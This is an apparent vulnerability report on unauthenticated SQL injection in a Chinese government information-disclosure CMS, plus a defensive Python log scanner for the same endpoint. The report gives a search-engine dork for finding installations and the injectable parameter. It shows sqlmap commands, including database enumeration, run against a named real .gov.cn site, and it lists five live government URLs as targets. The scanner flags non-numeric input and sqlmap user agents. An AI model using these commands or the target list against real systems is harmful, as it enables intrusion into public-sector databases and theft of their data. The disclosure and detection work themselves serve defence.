### Summary:
SQL injection in a government information-disclosure system that is in widespread use
### Details:
This system is widely deployed; Google search term: inurl:/xxgk/jcms_files
![0.jpg](https://images.seebug.org/upload/201503/04225155c57cb3c3ee17ff49a418c1f5b6959ab7.jpg)
`/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1`
No login is required; the `targetid` parameter is injectable.
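As an added example, not part of the original report: the server-side check that `targetid` should have been subjected to (a bare integer, nothing else), applied as a detection pass over web access logs for this endpoint. The path and parameter come from the report; the log lines, client addresses and the `valid_targetid`/`flag_request`/`scan` names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter named in the report.
VULN_PATH = "/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp"
PARAM = "targetid"

# Combined Log Format: client, timestamp, request line, status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)


def valid_targetid(raw):
    """Return targetid as int if it is a plain positive integer, else None.
    This is the input check the endpoint lacks: a value that is not a bare
    integer should be rejected before any query is built from it."""
    if raw is None or not re.fullmatch(r"[0-9]{1,9}", raw):
        return None
    return int(raw)


def flag_request(line):
    """Reasons a log line looks like a probe of the endpoint; [] if it is a
    normal request or is not for this endpoint at all."""
    m = LOG_RE.match(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    if url.path != VULN_PATH:
        return []
    reasons = []
    values = parse_qs(url.query, keep_blank_values=True).get(PARAM, [])
    if len(values) > 1:
        reasons.append("duplicate targetid parameter")
    for v in values:
        if valid_targetid(v) is None:
            reasons.append("non-numeric targetid: %r" % v)
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user agent")
    return reasons


# Constructed sample lines (not from the report); 203.0.113.0/24 is a documentation range.
SAMPLE_LOG = [
    '203.0.113.5 - - [04/Mar/2015:22:51:55 +0800] "GET ' + VULN_PATH + '?targetid=1 HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [04/Mar/2015:22:51:56 +0800] "GET ' + VULN_PATH + '?targetid=1%27 HTTP/1.1" 500 512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '203.0.113.9 - - [04/Mar/2015:22:52:01 +0800] "GET /xxgk/index.jsp HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]


def scan(lines):
    """(client ip, reasons) for every flagged line, in log order."""
    return [(LOG_RE.match(l).group("ip"), r) for l in lines if (r := flag_request(l))]
```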
### Proof of vulnerability:
```
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1"
```
![1.jpg](https://images.seebug.org/upload/201503/042257469253dd43afaf2bcf4faf4da945ae9f87.jpg)
```
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。
C:\Users\Administrator>sqlmap.py -u "http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1" --dbs
```
![3.jpg](https://images.seebug.org/upload/201503/042258347fb3b987d146ca87e2abbfb9d3f63e58.jpg)
There are a great many instances; these are the first five hits on the first page of the Google results:
```
http://xxgk.qingzhou.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://xxgk.taixing.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://www.xxgk.lg.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://zfxxgk.zj.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
http://www.jinhua.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/letterbox/que_letterbox.jsp?targetid=1
```